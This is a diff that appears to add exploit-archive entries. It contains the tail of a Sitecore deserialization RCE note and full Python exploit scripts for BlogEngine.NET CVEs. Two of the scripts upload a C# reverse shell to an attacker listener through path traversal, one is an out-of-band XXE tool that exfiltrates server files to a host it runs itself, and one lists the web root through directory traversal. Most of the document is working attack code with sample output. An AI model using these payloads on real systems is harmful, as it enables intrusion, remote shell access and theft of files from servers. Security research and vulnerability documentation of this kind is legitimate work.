@@ -0,0 +1,14 @@
+# Exploit Title: Sitecore v 8.x Deserialization RCE
+# Date: Reported to vendor October 2018, fix released April 2019.
+# Exploit Author: Jarad Kopf
+# Vendor Homepage: https://www.sitecore.com/
+# Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx
+# Version: Sitecore 8.0 Revision 150802
+# Tested on: Windows
+# CVE : CVE-2019-11080 
+
+Exploit: 
+
+Authentication is needed for this exploit. An attacker needs to login to Sitecore 8.0 revision 150802's Admin section. 
+When choosing to Serializeusers or domains in the admin UI, calls to /sitecore/shell/~/xaml/Sitecore.Shell.Applications.Dialogs.Progress.aspx will include a CSRFTOKEN parameter. 
+By replacing this parameter with a URL-encoded, base64-encoded crafted payload from ysoserial.net, an RCE is successful.
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47010.py b/exploits/aspx/webapps/47010.py
new file mode 100755
index 000000000..3aa71204c
--- /dev/null
+++ b/exploits/aspx/webapps/47010.py
@@ -0,0 +1,227 @@
+# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
+# Date: 17 Jun 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://blogengine.io/
+# Version: v3.3.7
+# Tested on: 3.3.7, 3.3.6
+# CVE : 2019-10719
+
+#1. Description
+#==============
+
+#BlogEngine.NET is vulnerable to an Directory Traversal on `/api/upload` which allows a RCE through the `theme` parameter.
+
+#2. Proof of Concept
+#=============
+
+#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`; exploit the directory traversal to upload the shell into the **/Custom/Themes** #directory:
+
+#~~~
+#POST /api/upload?action=filemgr&dirPath=%2f..%2f..%2fCustom%2fThemes%2fRCE_Test HTTP/1.1
+#Host: $RHOST
+#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+#Accept: text/plain
+#Accept-Language: en-US,en;q=0.5
+#Accept-Encoding: gzip, deflate
+#Cookie: XXX
+#Connection: close
+#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
+#Content-Length: 2085
+
+#-----------------------------12143974373743678091868871063
+#Content-Disposition: form-data; filename="PostView.ascx"
+
+#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
+#<%@ Import Namespace="BlogEngine.Core" %>
+
+#<script runat="server">
+#static System.IO.StreamWriter streamWriter;
+
+#    protected override void OnLoad(EventArgs e) {
+#        base.OnLoad(e);
+
+#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
+#using(System.IO.Stream stream = client.GetStream()) {
+#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
+#streamWriter = new System.IO.StreamWriter(stream);
+
+#StringBuilder strInput = new StringBuilder();
+
+#System.Diagnostics.Process p = new System.Diagnostics.Process();
+#p.StartInfo.FileName = "cmd.exe";
+#p.StartInfo.CreateNoWindow = true;
+#p.StartInfo.UseShellExecute = false;
+#p.StartInfo.RedirectStandardOutput = true;
+#p.StartInfo.RedirectStandardInput = true;
+#p.StartInfo.RedirectStandardError = true;
+#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
+#p.Start();
+#p.BeginOutputReadLine();
+
+#while(true) {
+#strInput.Append(rdr.ReadLine());
+#p.StandardInput.WriteLine(strInput);
+#strInput.Remove(0, strInput.Length);
+#    } } } } }
+
+#    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
+#  StringBuilder strOutput = new StringBuilder();
+
+#        if (!String.IsNullOrEmpty(outLine.Data)) {
+#        try {
+#                strOutput.Append(outLine.Data);
+#                    streamWriter.WriteLine(strOutput);
+#                    streamWriter.Flush();
+#} catch (Exception err) { }
+#       }
+#    }
+#</script>
+#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
+
+#-----------------------------12143974373743678091868871063--
+#~~~
+
+#The RCE can be triggered by setting the **theme** parameter to **RCE_TEST**: $RHOST/?theme=RCE_Test
+
+#==============================
+
+import argparse
+import io
+import json
+import os
+import re
+import requests
+import sys
+
+"""
+Exploit for CVE-2019-10719
+
+CVE Identified by: Aaron Bishop
+Exploit written by: Aaron Bishop
+
+Upload and trigger a reverse shell
+
+python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337
+
+Open a listener to capture the reverse shell - Metasploit or netcat
+
+nc -nlvp 1337
+listening on [any] 1337 ...
+connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+"""
+
+urls = {
+        "login": "/Account/login.aspx",
+        "traversal": "/api/filemanager"
+       }
+
+
+def make_request(session, method, target, params={}, data={}, files={}):
+    proxies = {
+            "http": "127.0.0.1:8080",
+            "https": "127.0.0.1:8080"
+              }
+    if method == 'GET':
+        r = requests.Request(method, target, params=params)
+    elif method == 'POST':
+        if files:
+            r = requests.Request(method, target, files=files)
+        else:
+            r = requests.Request(method, target, data=data)
+    prep = session.prepare_request(r)
+    resp = session.send(prep, verify=False, proxies=proxies)
+    return resp.text
+
+def login(session, host, user, passwd):
+    resp = make_request(session, 'GET', host+urls.get('login'))
+    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
+    login_data = dict([(i[0],i[2]) for i in login_form])
+    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
+    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
+    resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)
+
+def upload_shell(session, target, shell_dir, listener):
+    try:
+        lhost, lport = listener.split(':')
+    except:
+       print(target, " is not in the correct HOST:PORT format")
+       sys.exit(1)
+
+    shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
+<%@ Import Namespace="BlogEngine.Core" %>
+
+<script runat="server">
+	static System.IO.StreamWriter streamWriter;
+
+    protected override void OnLoad(EventArgs e) {
+        base.OnLoad(e);
+
+	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
+		using(System.IO.Stream stream = client.GetStream()) {
+			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
+				streamWriter = new System.IO.StreamWriter(stream);
+
+				StringBuilder strInput = new StringBuilder();
+
+				System.Diagnostics.Process p = new System.Diagnostics.Process();
+				p.StartInfo.FileName = "cmd.exe";
+				p.StartInfo.CreateNoWindow = true;
+				p.StartInfo.UseShellExecute = false;
+				p.StartInfo.RedirectStandardOutput = true;
+				p.StartInfo.RedirectStandardInput = true;
+				p.StartInfo.RedirectStandardError = true;
+				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
+				p.Start();
+				p.BeginOutputReadLine();
+
+				while(true) {
+					strInput.Append(rdr.ReadLine());
+					p.StandardInput.WriteLine(strInput);
+					strInput.Remove(0, strInput.Length);
+				}
+			}
+		}
+    	}
+    }
+
+    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
+   	StringBuilder strOutput = new StringBuilder();
+
+       	if (!String.IsNullOrEmpty(outLine.Data)) {
+       		try {
+                	strOutput.Append(outLine.Data);
+                    	streamWriter.WriteLine(strOutput);
+                    	streamWriter.Flush();
+                } catch (Exception err) { }
+        }
+    }
+
+</script>
+<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
+'''
+    make_request(session, "POST", target + "/api/upload?action=filemgr&dirPath=~/App_Data/files/../../Custom/Themes/" + shell_dir, files={"file": ("PostView.ascx".format(shell_dir=shell_dir), shell, "application/octet-stream")})
+
+def trigger_shell(session, target, shell_dir):
+    make_request(session, "GET", target + "/", params={"theme": shell_dir})
+
+def main(target, user, passwd, shell_dir, listener):
+    with requests.Session() as session:
+        login(session, target, user, passwd)
+        upload_shell(session, target, shell_dir, listener)
+        trigger_shell(session, target, shell_dir)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10719 Path traversal + RCE')
+    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
+    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
+    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
+    parser.add_argument('-d', '--dir', nargs='?', default="RCE", help='Theme Directory to write Reverse shell too')
+    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
+    parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
+    args = parser.parse_args()
+
+    protocol = "https://" if args.ssl else "http://"
+    main(protocol + args.target, args.user, args.passwd, args.dir, args.listener)
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47011.py b/exploits/aspx/webapps/47011.py
new file mode 100755
index 000000000..5a74205c3
--- /dev/null
+++ b/exploits/aspx/webapps/47011.py
@@ -0,0 +1,227 @@
+# Exploit Title: Directory Traversal + RCE on BlogEngine.NET
+# Date: 17 Jun 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://blogengine.io/
+# Version: v3.3.7
+# Tested on: 3.3.7, 3.3.6
+# CVE : 2019-10720
+
+#1. Description
+#==============
+
+#BlogEngine.NET is vulnerable to a Directory Traversal through the **theme** cookie which triggers a RCE.
+
+#2. Proof of Concept
+#=============
+
+#Using an account that has permissions to Edit Posts, upload a malicious file called `PostView.ascx`:
+
+#~~~
+#POST /api/upload?action=filemgr HTTP/1.1
+#Host: $RHOST
+#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+#Accept: text/plain
+#Accept-Language: en-US,en;q=0.5
+#Accept-Encoding: gzip, deflate
+#Cookie: XXX
+#Connection: close
+#Content-Type: multipart/form-data; boundary=---------------------------12143974373743678091868871063
+#Content-Length: 2085
+
+#-----------------------------12143974373743678091868871063
+#Content-Disposition: form-data; filename="PostView.ascx"
+
+#<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
+#<%@ Import Namespace="BlogEngine.Core" %>
+
+#<script runat="server">
+#static System.IO.StreamWriter streamWriter;
+
+#    protected override void OnLoad(EventArgs e) {
+#        base.OnLoad(e);
+
+#using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", 4445)) {
+#using(System.IO.Stream stream = client.GetStream()) {
+#using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
+#streamWriter = new System.IO.StreamWriter(stream);
+
+#StringBuilder strInput = new StringBuilder();
+
+#System.Diagnostics.Process p = new System.Diagnostics.Process();
+#p.StartInfo.FileName = "cmd.exe";
+#p.StartInfo.CreateNoWindow = true;
+#p.StartInfo.UseShellExecute = false;
+#p.StartInfo.RedirectStandardOutput = true;
+#p.StartInfo.RedirectStandardInput = true;
+#p.StartInfo.RedirectStandardError = true;
+#p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
+#p.Start();
+#p.BeginOutputReadLine();
+
+#while(true) {
+#strInput.Append(rdr.ReadLine());
+#p.StandardInput.WriteLine(strInput);
+#strInput.Remove(0, strInput.Length);
+#    } } } } }
+
+#    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
+#  StringBuilder strOutput = new StringBuilder();
+
+#        if (!String.IsNullOrEmpty(outLine.Data)) {
+#        try {
+#                strOutput.Append(outLine.Data);
+#                    streamWriter.WriteLine(strOutput);
+#                    streamWriter.Flush();
+#} catch (Exception err) { }
+#        }
+#    }
+#</script>
+#<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
+
+#-----------------------------12143974373743678091868871063--
+#~~~
+
+#Trigger the RCE by setting the **theme** cookie to **../../App_Data/files/2019/06/** and browsing to any page on the application; authentication is not required to trigger the RCE.
+=================================
+
+import argparse
+import io
+import json
+import os
+import re
+import requests
+import sys
+
+"""
+Exploit for CVE-2019-10719
+
+CVE Identified by: Aaron Bishop
+Exploit written by: Aaron Bishop
+
+Upload and trigger a reverse shell
+
+python exploit.py -t 192.168.10.9 -l 192.168.10.10:1337
+
+Open a listener to capture the reverse shell - Metasploit or netcat
+
+nc -nlvp 1337
+listening on [any] 1337 ...
+connect to [192.168.10.10] from (UNKNOWN) [192.168.10.9] 49680
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+"""
+
+urls = {
+        "login": "/Account/login.aspx",
+        "traversal": "/api/filemanager"
+       }
+
+
+def make_request(session, method, target, params={}, data={}, files={}):
+    proxies = {
+            "http": "127.0.0.1:8080",
+            "https": "127.0.0.1:8080"
+              }
+    if method == 'GET':
+        r = requests.Request(method, target, params=params)
+    elif method == 'POST':
+        if files:
+            r = requests.Request(method, target, files=files)
+        else:
+            r = requests.Request(method, target, data=data)
+    prep = session.prepare_request(r)
+    resp = session.send(prep, verify=False, proxies=proxies)
+    return resp.text
+
+def login(session, host, user, passwd):
+    resp = make_request(session, 'GET', host+urls.get('login'))
+    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
+    login_data = dict([(i[0],i[2]) for i in login_form])
+    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
+    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
+    resp = make_request(session, 'POST', host+urls.get('login'), data=login_data)
+
+def upload_shell(session, target, listener):
+    try:
+        lhost, lport = listener.split(':')
+    except:
+       print(target, " is not in the correct HOST:PORT format")
+       sys.exit(1)
+
+    shell = '''<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
+<%@ Import Namespace="BlogEngine.Core" %>
+
+<script runat="server">
+	static System.IO.StreamWriter streamWriter;
+
+    protected override void OnLoad(EventArgs e) {
+        base.OnLoad(e);
+
+	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("''' + lhost + '''", ''' + lport + ''')) {
+		using(System.IO.Stream stream = client.GetStream()) {
+			using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
+				streamWriter = new System.IO.StreamWriter(stream);
+
+				StringBuilder strInput = new StringBuilder();
+
+				System.Diagnostics.Process p = new System.Diagnostics.Process();
+				p.StartInfo.FileName = "cmd.exe";
+				p.StartInfo.CreateNoWindow = true;
+				p.StartInfo.UseShellExecute = false;
+				p.StartInfo.RedirectStandardOutput = true;
+				p.StartInfo.RedirectStandardInput = true;
+				p.StartInfo.RedirectStandardError = true;
+				p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
+				p.Start();
+				p.BeginOutputReadLine();
+
+				while(true) {
+					strInput.Append(rdr.ReadLine());
+					p.StandardInput.WriteLine(strInput);
+					strInput.Remove(0, strInput.Length);
+				}
+			}
+		}
+    	}
+    }
+
+    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
+   	StringBuilder strOutput = new StringBuilder();
+
+       	if (!String.IsNullOrEmpty(outLine.Data)) {
+       		try {
+                	strOutput.Append(outLine.Data);
+                    	streamWriter.WriteLine(strOutput);
+                    	streamWriter.Flush();
+                } catch (Exception err) { }
+        }
+    }
+
+</script>
+<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
+'''
+    make_request(session, "POST", target + "/api/upload?action=filemgr", files={"file": ("PostView.ascx", shell, "application/octet-stream")})
+
+def trigger_shell(session, target):
+    import datetime
+    now = datetime.datetime.now().strftime("%Y/%m/")
+    requests.get(target + "/", cookies={"theme": "../../App_Data/files/{}".format(now)})
+
+def main(target, user, passwd, listener):
+    with requests.Session() as session:
+        login(session, target, user, passwd)
+        upload_shell(session, target, listener)
+        trigger_shell(session, target)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10720 Path traversal + RCE')
+    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
+    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account with file upload permissions on blog')
+    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
+    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
+    parser.add_argument('-l', '--listener', action="store", help="Host:Port combination reverse shell should back to - 192.168.10.10:1337")
+    args = parser.parse_args()
+
+    protocol = "https://" if args.ssl else "http://"
+    main(protocol + args.target, args.user, args.passwd, args.listener)
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47014.py b/exploits/aspx/webapps/47014.py
new file mode 100755
index 000000000..63ae17805
--- /dev/null
+++ b/exploits/aspx/webapps/47014.py
@@ -0,0 +1,190 @@
+# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET
+# Date: 19 June 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://blogengine.io/
+# Version: v3.3.7
+# Tested on: 3.3.7, 3.3.6
+# CVE : 2019-10718
+
+#1. Description
+#==============
+
+#BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity
+#Injection attack on **/pingback.axd**.
+
+#2. Proof of Concept
+#=============
+
+#Host the following malicious DTD on a web server that is accessible to the
+#target system:
+
+#~~~
+#<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini">
+#<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2
+#~~~
+
+#Submit a request to `pingback.axd` containing a malicious XML body:
+
+#~~~{command="REQUEST"}
+#POST /pingback.axd HTTP/1.1
+#Host: $RHOST
+#Accept-Encoding: gzip, deflate
+#Connection: close
+#User-Agent: python-requests/2.12.4
+#Accept: */*
+#Content-Type: text/xml
+#Content-Length: 131
+
+#<?xml version="1.0"?>
+#<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd">
+#<foo>&e1;</foo>
+#<methodName>pingback.ping</methodName>
+#~~~
+
+#The application will request the remote DTD and submit a subsequent request
+#containing the contents of the file:
+
+#~~~
+#$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 -
+#$RHOST - - [17/May/2019 12:03:32] "GET
+#/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1
+#HTTP/1.1" 200 -
+#~~~
+
+#! /usr/bin/env python3
+import argparse
+import http.server
+import json
+import multiprocessing
+import os
+import re
+import requests
+import sys
+import time
+import urllib
+
+"""
+Exploit for CVE-2019-10718
+
+CVE Identified by: Aaron Bishop
+Exploit written by: Aaron Bishop
+
+Submit a XML to the target, get the contents of the file in a follow up request from the target
+
+python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt
+
+Requesting C:/Windows/win.ini ...
+$RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 -
+$RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 -
+
+Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ...
+$RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 -
+Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config
+
+Requesting C:/inetpub/wwwroot/iisstart.htm ...
+$RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 -
+Unable to read C:/inetpub/wwwroot/iisstart.htm
+
+Requesting C:/Windows/iis.log ...
+$RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 -
+Unable to read C:/Windows/iis.log
+
+Requesting C:/Users/Public/test.txt ...
+$RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 -
+$RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 -
+
+"""
+
+xml = """<?xml version="1.0"?>
+<!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd">
+<foo>&e1;</foo>
+<methodName>pingback.ping</methodName>
+"""
+
+dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}">
+<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>"> %p2;
+"""
+
+proxies = {
+            "http": "127.0.0.1:8080",
+            "https": "127.0.0.1:8080"
+          }
+
+file_queue = multiprocessing.Queue()
+response_queue = multiprocessing.Queue()
+response_counter = multiprocessing.Value('i', 0)
+
+class S(http.server.SimpleHTTPRequestHandler):
+    server_version = 'A Patchey Webserver'
+    sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078'
+    error_message_format = 'Donde esta la biblioteca?'
+
+    def _set_headers(self):
+            self.send_response(200)
+            self.send_header('Content-Type', 'application/xml')
+            self.end_headers()
+
+    def do_GET(self):
+        if self.path.endswith(".dtd"):
+            self._set_headers()
+            self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8'))
+        elif self.path.startswith("/X"):
+            self._set_headers()
+            response_counter.value += 1
+            response_queue.put(self.path)
+            self.wfile.write('<response>Thanks</response>'.encode('utf-8'))
+        else:
+            self._set_headers()
+            self.wfile.write('<error>?</error>')
+
+
+def start_server(lhost, lport, server):
+    httpd = http.server.HTTPServer((lhost, lport), server)
+    httpd.serve_forever()
+
+def main(rhost, lhost, lport, files, timeout, proxy, output_dir):
+    print(output_dir)
+    if not output_dir:
+        return
+    for f in files:
+        file_queue.put_nowait(f)
+
+    server = S
+    server.lhost, server.lport = lhost, lport
+    p = multiprocessing.Process(target=start_server, args=(lhost,lport,server))
+    p.start()
+    for num, f in enumerate(files):
+        print("\nRequesting {} ...".format(f))
+        count = 0
+        r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"})
+        response = True
+        while num == response_counter.value:
+            if count >= timeout:
+                response = False
+                response_counter.value += 1
+                print("Unable to read {}".format(f))
+                break
+            time.sleep(1)
+            count += 1
+        if response:
+            os.makedirs(output_dir, exist_ok=True)
+            with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh:
+                fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?',''))
+
+    p.terminate()
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE')
+    parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host')
+    parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host')
+    parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port')
+    parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST')
+    parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file')
+    parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy')
+    parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory.  Default ./CVE-2019-10718')
+    args = parser.parse_args()
+
+    if isinstance(args.files, str):
+        args.files = [args.files]
+    main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output)
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47035.py b/exploits/aspx/webapps/47035.py
new file mode 100755
index 000000000..76a1303fb
--- /dev/null
+++ b/exploits/aspx/webapps/47035.py
@@ -0,0 +1,183 @@
+# Exploit Title: Directory Traversal on BlogEngine.NET
+# Date: 24 Jun 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://blogengine.io/
+# Version: v3.3.7
+# Tested on: 3.3.7, 3.3.6
+# CVE : 2019-10717
+
+1. Description
+==============
+
+BlogEngine.NET is vulnerable to a directory traversal.  The page parameter, passed to /api/filemanager, reveals the contents of the directory.
+
+2. Proof of Concept
+=============
+
+Log in to the application and submit a GET request to /api/filemanager:
+
+Request:
+
+~~~
+GET /api/filemanager?path=/../../ HTTP/1.1
+Host: $RHOST
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: $COOKIE
+Connection: close
+Upgrade-Insecure-Requests: 1
+~~~
+
+Depending on how the request is submitted, the response may be XML or JSON
+
+XML Response
+
+~~~
+HTTP/1.1 200 OK
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: application/xml; charset=utf-8
+Expires: -1
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+Date: Wed, 15 May 2019 01:58:46 GMT
+Connection: close
+Content-Length: 13030
+
+<ArrayOfFileInstance xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/BlogEngine.Core.FileSystem">
+<FileInstance>
+    <Created>5/14/2019 6:58:46 PM</Created>
+    <FileSize></FileSize>
+    <FileType>Directory</FileType>
+    <FullPath>~/App_Data/files/../..</FullPath>
+    <IsChecked>false</IsChecked>
+    <Name>...</Name>
+    <SortOrder>0</SortOrder>
+</FileInstance>
+...
+~~~
+
+JSON Response
+
+~~~
+HTTP/1.1 200 OK
+Cache-Control: no-cache
+Pragma: no-cache
+Content-Type: application/json; charset=utf-8
+Expires: -1
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+Date: Wed, 15 May 2019 02:35:13 GMT
+Connection: close
+Content-Length: 10011
+
+[
+    {
+        "IsChecked":false,
+        "SortOrder":0,
+        "Created":"5/14/2019 7:35:13 PM",
+        "Name":"...",
+        "FileSize":"",
+        "FileType":0,
+        "FullPath":"~/App_Data/files/../..",
+        "ImgPlaceholder":""
+    }
+...
+~~~
+
+import argparse
+import json
+import os
+import re
+import requests
+import sys
+
+"""
+Exploit for CVE-2019-10717
+
+CVE Identified by: Aaron Bishop
+Exploit written by: Aaron Bishop
+
+Outputs list of filenames found in web root
+
+python exploit.py -t $RHOST
+
+?path=/../..
+/../../archive.aspx
+/../../archive.aspx.cs
+/../../archive.aspx.designer.cs
+/../../BlogEngine.NET.csproj
+/../../BlogEngine.NET.csproj.user
+/../../contact.aspx
+/../../contact.aspx.cs
+/../../contact.aspx.designer.cs
+"""
+
+urls = {
+        "login": "/Account/login.aspx",
+        "traversal": "/api/filemanager"
+       }
+
+def make_request(session, method, target, data={}):
+    proxies = {
+            "http": "127.0.0.1:8080",
+            "https": "127.0.0.1:8080"
+              }
+    if method == 'GET':
+        r = requests.Request(method, target, params=data)
+    elif method == 'POST':
+        r = requests.Request(method, target, data=data)
+    prep = session.prepare_request(r)
+    resp = session.send(prep, verify=False, proxies=proxies)
+    return resp.text
+
+def login(session, host, user, passwd):
+    resp = make_request(session, 'GET', host+urls.get('login'))
+    login_form = re.findall('<input\s+.*?name="(?P<name>.*?)"\s+.*?(?P<tag>\s+value="(?P<value>.*)")?\s/>', resp)
+    login_data = dict([(i[0],i[2]) for i in login_form])
+    login_data.update({'ctl00$MainContent$LoginUser$UserName': user})
+    login_data.update({'ctl00$MainContent$LoginUser$Password': passwd})
+    resp = make_request(session, 'POST', host+urls.get('login'), login_data)
+
+def parse(body, path, outfile):
+    paths = json.loads(body)
+    new_paths = set()
+    for i in paths:
+        if i.get('FileType') == 0:
+            new_paths.add(i.get('FullPath'))
+        else:
+            outfile.write("{path}\n".format(path=i.get('FullPath')))
+    return new_paths
+
+def traverse(session, host, paths, outfile, visited=set()):
+    paths = set(paths) - visited
+    for path in paths:
+        print path
+        outfile.write("\n?path={path}\n".format(path=path))
+        visited.add(path)
+        resp = make_request(session, 'GET', host+urls.get('traversal'), data=dict(path=path))
+        new_paths = parse(resp, path, outfile)
+        if new_paths:
+            traverse(session, host, new_paths, outfile, visited)
+
+def main(host, user, passwd, root, outfile):
+    with requests.Session() as s:
+        login(s, host, user, passwd)
+        traverse(s, host, root, outfile)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10717 Path traversal')
+    parser.add_argument('-t', '--target', action="store", dest="target", required=True, help='Target host')
+    parser.add_argument('-u', '--user', default="admin", action="store", dest="user", help='Account on blog')
+    parser.add_argument('-p', '--passwd', default="admin", action="store", dest="passwd", help='Password for account')
+    parser.add_argument('-r', '--root', nargs='+', default="/../..", help='Starting paths')
+    parser.add_argument('-s', '--ssl', action="store_true", help="Force SSL")
+    parser.add_argument('-o', '--outfile', type=argparse.FileType('w'), default='CVE-2019-10717.txt')
+    args = parser.parse_args()
+
+    protocol = "https://" if args.ssl else "http://"
+    if isinstance(args.root, str):
+        args.root = [args.root]
+    main(protocol + args.target, args.user, args.passwd, args.root, args.outfile)
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47106.txt b/exploits/aspx/webapps/47106.txt
new file mode 100644
index 000000000..6cc1f62e4
--- /dev/null
+++ b/exploits/aspx/webapps/47106.txt
@@ -0,0 +1,27 @@
